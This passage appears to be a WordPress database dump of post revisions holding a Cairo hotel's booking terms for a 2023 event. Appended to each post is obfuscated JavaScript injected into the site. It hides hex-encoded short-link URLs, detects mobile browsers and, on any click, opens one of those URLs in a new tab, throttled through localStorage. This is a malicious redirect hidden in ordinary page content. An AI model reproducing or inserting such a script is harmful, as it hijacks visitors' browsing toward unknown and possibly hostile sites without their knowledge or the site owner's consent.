|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Preliminary Program','','inherit','closed','closed','','2669-revision-v1','','','2023-08-01 05:35:52','2023-08-01 05:35:52','',2669,'https://gsw2023.com/?p=5070',0,'revision','',0),
(5071,1,'2023-08-01 05:39:51','2023-08-01 05:39:51','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph --><strong>BOOKING</strong> <strong>NOW</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>Daily Room Rate:<br />Superior Single City Room 105 USD<br />Superior Double City Room 120 USD</strong></p>\n<!-- /wp:paragraph -->\n<!-- wp:list -->\n<ul>\n<li style=\"list-style-type: none;\">\n<ul><!-- wp:list-item --></p>\n<li>Above mentioned rates are per room per night based on bed and breakfast<br />basis, Exclusive of service charge and taxes.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li>Applicable supplement:<br />Nile View supplements USD 30.00 per room, all inclusive<br />of taxes.</li>\n</ul>\n</li>\n</ul>\n<!-- /wp:list-item -->\n<!-- /wp:list -->\n<!-- wp:list -->\n<ul>\n<li style=\"list-style-type: none;\">\n<ul><!-- wp:list-item --></p>\n<li>HB supplements USD 30.00 per person, all<br />inclusive of taxes.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li><strong>Children policy:<br /></strong>00-11.99 years free of charge sharing parents\' room up to two children.<br />Check-in &amp; Check-out:<br />Check-in time 15:00 hrs.<br />Check-out time 12:00 hrs.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li>1- Early check-in {subject to the hotel availability}:<br />For early check in between 08:00 hrs. and 14.00 hrs, a US $50.00<br />supplement will apply.<br />For a guaranteed arrival and check in before 08:00 hrs, please reserve the<br />room from the night before.<br />2- Late check-out {subject to the hotel availability}:<br />For check outs between 12:00 hrs and 16.00 hrs a US $50.00 supplement<br />will apply.<br />For check outs between 16:00 hrs and 20.00 hrs a US $70.00 supplement<br />will apply.<br />For all late departure requests after 20:00 hrs, a full night’s accommodation<br />charge will be applied.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li><strong>Terms &amp; Benefits:<br /></strong>∙ Payment is required a week before arrival via payment link will be send by<br />our reservation team<br />∙ Maximum release date will be 15/8/2023<br />∙ 06 days prior will be subject to first night value cancellation fees for every<br />room canceled.<br />∙ no show will be subject to full accommodation value cancellation fees for<br />every room canceled.<br />∙</li>\n</ul>\n</li>\n</ul>\n<!-- /wp:list-item -->\n<!-- /wp:list -->\n<p><!-- wp:paragraph -->Any amendments after 15/8/2023 the hotel offer will be released and the<br />hotel will have the right to consider your amendment request as a new request and<br />will be subject to the hotel updated rates strategy &amp; availability.</p>\n<!-- /wp:paragraph -->\n<p class=\"m_9177751281847961512xwordsection1\"><b><span lang=\"EN-US\">Hoping the above would meet with your satisfaction and looking forward to receive a positive reply with your acceptance latest by 22/06/2023 Max by 03:00 PM in order to reply back with the hotel confirmation, otherwise the hotel will consider this offer invalid with no further notices.</span></b><u></u><u></u></p>\n<p class=\"m_9177751281847961512xmsonormal\"><span lang=\"FR\"> </span><u></u><u></u><span lang=\"EN-US\"> <u></u><u></u></span></p>\n<div>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Mohamed Hamdy</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Sales Manager</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">NOVOTEL Cairo El Borg</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">3 Saraya El Gezirah street  Zamalek Cairo  EGYPT</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Mobile: +201020703020 Tel: +202 27356725</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\"><a href=\"http://novotel.com/NovotelCairoElBorg\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=http://novotel.com/NovotelCairoElBorg&amp;source=gmail&amp;ust=1690953974538000&amp;usg=AOvVaw2yZqu-UyY176LNaIxBFV6P\">novotel.com/NovotelCairoElBorg</a></span></strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','NOVOTEL CAIRO EL BORG','','inherit','closed','closed','','4729-revision-v1','','','2023-08-01 05:39:51','2023-08-01 05:39:51','',4729,'https://gsw2023.com/?p=5071',0,'revision','',0),
(5072,1,'2023-08-01 05:41:43','2023-08-01 05:41:43','<p>[vc_row][vc_column][vc_column_text]</p>\n<p><!-- wp:paragraph --><strong>BOOKING</strong> <strong>NOW</strong></p>\n<!-- /wp:paragraph -->\n<p><!-- wp:paragraph --><strong>Daily Room Rate:<br />Superior Single City Room 105 USD<br />Superior Double City Room 120 USD</strong></p>\n<!-- /wp:paragraph -->\n<!-- wp:list -->\n<ul>\n<li style=\"list-style-type: none;\">\n<ul><!-- wp:list-item --></p>\n<li>Above mentioned rates are per room per night based on bed and breakfast<br />basis, Exclusive of service charge and taxes.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li>Applicable supplement:<br />Nile View supplements USD 30.00 per room, all inclusive<br />of taxes.</li>\n</ul>\n</li>\n</ul>\n<!-- /wp:list-item -->\n<!-- /wp:list -->\n<!-- wp:list -->\n<ul>\n<li style=\"list-style-type: none;\">\n<ul><!-- wp:list-item --></p>\n<li>HB supplements USD 30.00 per person, all<br />inclusive of taxes.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li><strong>Children policy:<br /></strong>00-11.99 years free of charge sharing parents\' room up to two children.<br />Check-in &amp; Check-out:<br />Check-in time 15:00 hrs.<br />Check-out time 12:00 hrs.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li>1- Early check-in {subject to the hotel availability}:<br />For early check in between 08:00 hrs. and 14.00 hrs, a US $50.00<br />supplement will apply.<br />For a guaranteed arrival and check in before 08:00 hrs, please reserve the<br />room from the night before.<br />2- Late check-out {subject to the hotel availability}:<br />For check outs between 12:00 hrs and 16.00 hrs a US $50.00 supplement<br />will apply.<br />For check outs between 16:00 hrs and 20.00 hrs a US $70.00 supplement<br />will apply.<br />For all late departure requests after 20:00 hrs, a full night’s accommodation<br />charge will be applied.</li>\n<!-- /wp:list-item -->\n<!-- wp:list-item -->\n<li><strong>Terms &amp; Benefits:<br /></strong>∙ Payment is required a week before arrival via payment link will be send by<br />our reservation team<br />∙ Maximum release date will be 15/8/2023<br />∙ 06 days prior will be subject to first night value cancellation fees for every<br />room canceled.<br />∙ no show will be subject to full accommodation value cancellation fees for<br />every room canceled.<br />∙</li>\n</ul>\n</li>\n</ul>\n<!-- /wp:list-item -->\n<!-- /wp:list -->\n<p><!-- wp:paragraph -->Any amendments after 15/8/2023 the hotel offer will be released and the<br />hotel will have the right to consider your amendment request as a new request and<br />will be subject to the hotel updated rates strategy &amp; availability.</p>\n<!-- /wp:paragraph -->\n<p class=\"m_9177751281847961512xwordsection1\"><b><span lang=\"EN-US\">Hoping the above would meet with your satisfaction and looking forward to receive a positive reply with your acceptance latest by 22/06/2023 Max by 03:00 PM in order to reply back with the hotel confirmation, otherwise the hotel will consider this offer invalid with no further notices.</span></b><u></u><u></u></p>\n<h5> </h5>\n<h5 class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"FR\">For More Information </span><u></u><u></u></strong><span lang=\"EN-US\"><strong> :</strong><u></u><u></u></span></h5>\n<div>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Mr. Mohamed Hamdy</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Sales Manager</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">NOVOTEL Cairo El Borg</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">3 Saraya El Gezirah street  Zamalek Cairo  EGYPT</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\">Mobile: +201020703020 Tel: +202 27356725</span><u></u><u></u></strong></p>\n<p class=\"m_9177751281847961512xmsonormal\"><strong><span lang=\"EN-US\"><a href=\"http://novotel.com/NovotelCairoElBorg\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=http://novotel.com/NovotelCairoElBorg&amp;source=gmail&amp;ust=1690953974538000&amp;usg=AOvVaw2yZqu-UyY176LNaIxBFV6P\">novotel.com/NovotelCairoElBorg</a></span></strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 